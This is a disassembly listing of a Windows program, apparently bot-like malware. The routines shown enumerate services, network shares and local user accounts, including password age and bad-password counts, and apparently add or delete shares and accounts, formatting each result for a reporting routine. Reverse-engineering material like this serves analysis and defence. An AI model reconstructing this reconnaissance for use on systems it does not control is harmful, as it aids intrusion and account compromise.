; ---------------------------------------------------------------------------
loc_418DD1: ; CODE XREF: sub_418D2A+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418DD8: ; CODE XREF: sub_418D2A+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418DDF: ; CODE XREF: sub_418D2A+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_418E55 ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
jz short loc_418E42
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_418E55 ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_418E96[ecx]
jmp ds:off_418E6E[ecx*4] ; switch jump
loc_418E03: ; DATA XREF: .text:off_418E6E�o
push offset aTheSpecifiedDa ; jumptable 00418DFC case 7
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E0A: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceDepe ; jumptable 00418DFC case 17
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E11: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceDe_0 ; jumptable 00418DFC case 10
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E18: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceHasB ; jumptable 00418DFC case 0
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E1F: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheSpecified_0 ; jumptable 00418DFC case 2
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E26: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceCoul ; jumptable 00418DFC case 11
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E2D: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceHa_0 ; jumptable 00418DFC case 14
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E34: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheRequested_1 ; jumptable 00418DFC case 3
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E3B: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceHasN ; jumptable 00418DFC case 4
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E42: ; CODE XREF: sub_418D2A+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_418E47: ; CODE XREF: sub_418D2A+41�j
; sub_418D2A+4B�j ...
push offset byte_4DB380 ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_418E68
; ---------------------------------------------------------------------------
loc_418E55: ; CODE XREF: sub_418D2A+36�j
; sub_418D2A+89�j ...
push eax ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownError ; "An unknown error occurred: <%ld>"
push offset byte_4DB380 ; Dest
call _sprintf
add esp, 0Ch
loc_418E68: ; CODE XREF: sub_418D2A+129�j
mov eax, offset byte_4DB380
retn
sub_418D2A endp
; ---------------------------------------------------------------------------
off_418E6E dd offset loc_418E18 ; DATA XREF: sub_418D2A+D2�r
dd offset loc_418E1F ; jump table for switch statement
dd offset loc_418E34
dd offset loc_418E3B
dd offset loc_418E03
dd offset loc_418E11
dd offset loc_418E26
dd offset loc_418E2D
dd offset loc_418E0A
dd offset loc_418E55
byte_418E96 db 0, 9, 1, 2 ; DATA XREF: sub_418D2A+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418EA8(int,char *Str,int)
sub_418EA8 proc near ; CODE XREF: sub_401ACD+44D6�p
var_38C = dword ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_4CB9C8 ; OpenSCManagerA
push ebx ; int
mov [ebp+var_C], eax
push [ebp+arg_8] ; int
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_418EE0: ; CODE XREF: sub_418EA8+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_4CB994 ; EnumServicesStatusA
test eax, eax
jnz short loc_418F1A
call ds:dword_427094 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_418FCE
loc_418F1A: ; CODE XREF: sub_418EA8+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_418FC5
lea esi, [ebp+var_188]
loc_418F2B: ; CODE XREF: sub_418EA8+117�j
mov eax, [esi+8]
dec eax
jz short loc_418F74
dec eax
jz short loc_418F6D
dec eax
jz short loc_418F66
dec eax
jz short loc_418F5F
dec eax
jz short loc_418F58
dec eax
jz short loc_418F51
dec eax
jz short loc_418F4A
push offset aUnknown_0 ; " Unknown"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F4A: ; CODE XREF: sub_418EA8+99�j
push offset aPaused ; " Paused"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F51: ; CODE XREF: sub_418EA8+96�j
push offset aPausing ; " Pausing"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F58: ; CODE XREF: sub_418EA8+93�j
push offset aContinuing ; " Continuing"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F5F: ; CODE XREF: sub_418EA8+90�j
push offset aRunning ; " Running"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F66: ; CODE XREF: sub_418EA8+8D�j
push offset aStoping ; " Stoping"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F6D: ; CODE XREF: sub_418EA8+8A�j
push offset aStarting ; " Starting"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F74: ; CODE XREF: sub_418EA8+87�j
push offset aStopped ; " Stopped"
loc_418F79: ; CODE XREF: sub_418EA8+A0�j
; sub_418EA8+A7�j ...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+Dest]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_2 ; "%s: %s (%s)"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+var_38C]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_418F2B
loc_418FC5: ; CODE XREF: sub_418EA8+77�j
cmp [ebp+var_8], ebx
jnz loc_418EE0
loc_418FCE: ; CODE XREF: sub_418EA8+6C�j
push [ebp+var_C]
call dword_4CB8CC ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_418EA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418FE5(int,char *Str,int)
sub_418FE5 proc near ; CODE XREF: sub_401ACD:loc_406064�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Str]
test edi, edi
jz loc_41907F
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_41900E
dec eax
jnz short loc_41905F
push edi
push 0
call sub_4191B8
pop ecx
pop ecx
jmp short loc_41905B
; ---------------------------------------------------------------------------
loc_41900E: ; CODE XREF: sub_418FE5+18�j
cmp [ebp+arg_8], 0
jnz short loc_41904D
push 24h ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz short loc_41904D
push 57h
pop eax
loc_419025: ; CODE XREF: sub_418FE5+78�j
push eax
call sub_4199AC
pop ecx
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset byte_4DB63C
push off_439518[eax*4]
push offset asc_439BC4 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41904D: ; CODE XREF: sub_418FE5+2D�j
; sub_418FE5+3B�j
push [ebp+arg_8] ; int
push edi ; Str
push 0 ; int
call sub_41910C
add esp, 0Ch
loc_41905B: ; CODE XREF: sub_418FE5+27�j
test eax, eax
jnz short loc_419025
loc_41905F: ; CODE XREF: sub_418FE5+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset byte_4DB63C
push off_43951C[eax*4]
push offset asc_439BA8 ; "-"
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41907F: ; CODE XREF: sub_418FE5+A�j
mov eax, [ebp+arg_0]
mov esi, offset byte_4DB63C
lea eax, [eax+eax*2]
push off_439518[eax*4]
push offset asc_439B84 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_41909F: ; CODE XREF: sub_418FE5+66�j
; sub_418FE5+98�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_418FE5 endp
; =============== S U B R O U T I N E =======================================
sub_4190A5 proc near ; CODE XREF: sub_41A3C6+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_4190B2
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4190B2: ; CODE XREF: sub_4190A5+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_427188
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test byte_4DB83C, 1
mov ebp, eax
jnz short loc_4190EF
or byte_4DB83C, 1
lea eax, [ebp+1]
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov dword_4DB5DC, eax
loc_4190EF: ; CODE XREF: sub_4190A5+32�j
push esi
push esi
push ebp
push dword_4DB5DC
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_4DB5DC
pop edi
pop ebp
pop ebx
pop esi
retn
sub_4190A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41910C(int,char *Str,int)
sub_41910C proc near ; CODE XREF: sub_418FE5+6E�p
; sub_41A6EA+18A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_419177
push [ebp+Str]
mov edi, eax
call sub_419177
push 24h ; Val
mov [ebp+var_20], eax
push [ebp+Str] ; Str
call _strchr
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_419177
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_4CB8C8
pop edi
leave
retn
sub_41910C endp
; =============== S U B R O U T I N E =======================================
sub_419177 proc near ; CODE XREF: sub_41910C+A�p
; sub_41910C+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_419184
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419184: ; CODE XREF: sub_419177+9�j
push ebx
push esi
mov esi, ds:dword_4270E8
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_419177 endp
; =============== S U B R O U T I N E =======================================
sub_4191B8 proc near ; CODE XREF: sub_418FE5+20�p
; sub_41A3C6+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_419177
push [esp+8+arg_4]
mov esi, eax
call sub_419177
pop ecx
pop ecx
push 0
push eax
push esi
call dword_4CB8A0
pop esi
retn
sub_4191B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4191DB(int,char *Str,int,int)
sub_4191DB proc near ; CODE XREF: sub_401ACD+45AE�p
Dest = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_419177
xor esi, esi
mov [ebp+var_C], eax
push esi ; int
mov [ebp+arg_C], esi
push [ebp+arg_8] ; int
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 18h
loc_419214: ; CODE XREF: sub_4191DB+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_4CB918
mov ebx, eax
cmp ebx, esi
jz short loc_419277
cmp ebx, 0EAh
jz short loc_419277
push ebx
push ebx
call sub_4199AC
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_439C10 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 24h
jmp short loc_4192E4
; ---------------------------------------------------------------------------
loc_419277: ; CODE XREF: sub_4191DB+5D�j
; sub_4191DB+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_4192DB
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_419285: ; CODE XREF: sub_4191DB+FC�j
push dword ptr [esi+10h]
call dword_4CB8BC ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_41929C
mov eax, offset aNo ; "No"
loc_41929C: ; CODE XREF: sub_4191DB+BA�j
push eax
lea eax, [ebp+Dest]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_419285
xor esi, esi
loc_4192DB: ; CODE XREF: sub_4191DB+A2�j
push [ebp+var_4]
call dword_4CBA64
loc_4192E4: ; CODE XREF: sub_4191DB+9A�j
cmp ebx, 0EAh
jz loc_419214
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4191DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4192FC(int,int,int,int,char *Str,int)
sub_4192FC proc near ; CODE XREF: sub_401ACD:loc_4060ED�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Str = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_4193A1
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_41933E
dec eax
jz short loc_419333
dec eax
jnz short loc_419359
push [ebp+arg_14] ; int
push [ebp+Str] ; Str
push [ebp+arg_C] ; int
push ebx ; int
push edi ; int
call sub_419443
add esp, 14h
jmp short loc_419355
; ---------------------------------------------------------------------------
loc_419333: ; CODE XREF: sub_4192FC+1D�j
push ebx
push edi
call sub_419422
pop ecx
pop ecx
jmp short loc_419355
; ---------------------------------------------------------------------------
loc_41933E: ; CODE XREF: sub_4192FC+1A�j
cmp [ebp+arg_8], edi
jz short loc_419352
push [ebp+arg_8]
push ebx
push edi
call sub_4193C8
add esp, 0Ch
jmp short loc_419355
; ---------------------------------------------------------------------------
loc_419352: ; CODE XREF: sub_4192FC+45�j
push 57h
pop eax
loc_419355: ; CODE XREF: sub_4192FC+35�j
; sub_4192FC+40�j ...
cmp eax, edi
jnz short loc_419379
loc_419359: ; CODE XREF: sub_4192FC+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset byte_4DB840
push off_43951C[eax*4]
push offset asc_439CC8 ; "-"
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_4193C1
; ---------------------------------------------------------------------------
loc_419379: ; CODE XREF: sub_4192FC+5B�j
push eax
call sub_4199AC
pop ecx
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset byte_4DB840
push off_439518[eax*4]
push offset asc_439C98 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_4193C1
; ---------------------------------------------------------------------------
loc_4193A1: ; CODE XREF: sub_4192FC+D�j
mov eax, [ebp+arg_0]
mov esi, offset byte_4DB840
lea eax, [eax+eax*2]
push off_439518[eax*4]
push offset asc_439C70 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_4193C1: ; CODE XREF: sub_4192FC+7B�j
; sub_4192FC+A3�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4192FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4193C8 proc near ; CODE XREF: sub_4192FC+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_419177
push [ebp+arg_4]
mov edi, eax
call sub_419177
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_419177
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_4CB8AC
pop edi
leave
retn
sub_4193C8 endp
; =============== S U B R O U T I N E =======================================
sub_419422 proc near ; CODE XREF: sub_4192FC+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_419177
push [esp+8+arg_4]
mov esi, eax
call sub_419177
pop ecx
pop ecx
push eax
push esi
call dword_4CB89C
pop esi
retn
sub_419422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419443(int,int,int,char *Str,int)
sub_419443 proc near ; CODE XREF: sub_4192FC+2D�p
Dest = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_419177
push [ebp+arg_4]
mov esi, eax
call sub_419177
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_4CBA2C
test eax, eax
mov [ebp+arg_0], eax
jnz loc_4197EB
mov eax, [ebp+var_4]
test eax, eax
jz loc_419826
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+Dest]
push offset aAccountS ; "Account: %S"
push eax ; Dest
call _sprintf
mov esi, [ebp+arg_10]
mov edi, [ebp+Str]
mov ebx, [ebp+arg_8]
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+0Ch]
lea eax, [ebp+Dest]
push offset aFullNameS ; "Full Name: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+8]
lea eax, [ebp+Dest]
push offset aUserCommentS ; "User Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4]
lea eax, [ebp+Dest]
push offset aCommentS ; "Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
mov eax, [eax+10h]
sub eax, 0
jz short loc_419562
dec eax
jz short loc_41955B
dec eax
jz short loc_419554
mov eax, offset aUnknown ; "Unknown"
jmp short loc_419567
; ---------------------------------------------------------------------------
loc_419554: ; CODE XREF: sub_419443+108�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_419567
; ---------------------------------------------------------------------------
loc_41955B: ; CODE XREF: sub_419443+105�j
mov eax, offset aUser_3 ; "User"
jmp short loc_419567
; ---------------------------------------------------------------------------
loc_419562: ; CODE XREF: sub_419443+102�j
mov eax, offset aGuest ; "Guest"
loc_419567: ; CODE XREF: sub_419443+10F�j
; sub_419443+116�j ...
push eax
lea eax, [ebp+Dest]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+14h]
lea eax, [ebp+Dest]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+1Ch]
lea eax, [ebp+Dest]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+20h]
lea eax, [ebp+Dest]
push offset aParametersS ; "Parameters: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+18h]
lea eax, [ebp+Dest]
push offset aPasswordAgeD ; "Password Age: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+2Ch]
lea eax, [ebp+Dest]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+30h]
lea eax, [ebp+Dest]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+24h]
lea eax, [ebp+Dest]
push offset aLastLogonD ; "Last Logon: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+28h]
lea eax, [ebp+Dest]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+34h]
lea eax, [ebp+Dest]
push offset aLogonServerS ; "Logon Server: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+3Ch]
lea eax, [ebp+Dest]
push offset aWorkstationsS ; "Workstations: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+38h]
lea eax, [ebp+Dest]
push offset aCountryCodeD ; "Country Code: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4Ch]
lea eax, [ebp+Dest]
push offset aUserSLanguageD ; "User's Language: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+40h]
lea eax, [ebp+Dest]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+44h]
lea eax, [ebp+Dest]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409869
add esp, 20h
pop edi
pop ebx
jmp short loc_419817
; ---------------------------------------------------------------------------
loc_4197EB: ; CODE XREF: sub_419443+35�j
push eax
lea eax, [ebp+Dest]
push offset asc_439CE8 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_10] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_8] ; int
call sub_409869
add esp, 20h
loc_419817: ; CODE XREF: sub_419443+3A6�j
cmp [ebp+var_4], 0
jz short loc_419826
push [ebp+var_4]
call dword_4CBA64
loc_419826: ; CODE XREF: sub_419443+40�j
; sub_419443+3D8�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_419443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41982C(int,char *Str,int,int)
sub_41982C proc near ; CODE XREF: sub_401ACD+463A�p
Dest = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_419177
push esi ; int
mov [ebp+var_14], eax
push [ebp+arg_8] ; int
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 18h
loc_41986B: ; CODE XREF: sub_41982C+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_4CB934
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_4198CC
cmp eax, 0EAh
jz short loc_4198CC
push eax
push eax
call sub_4199AC
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_439ED8 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
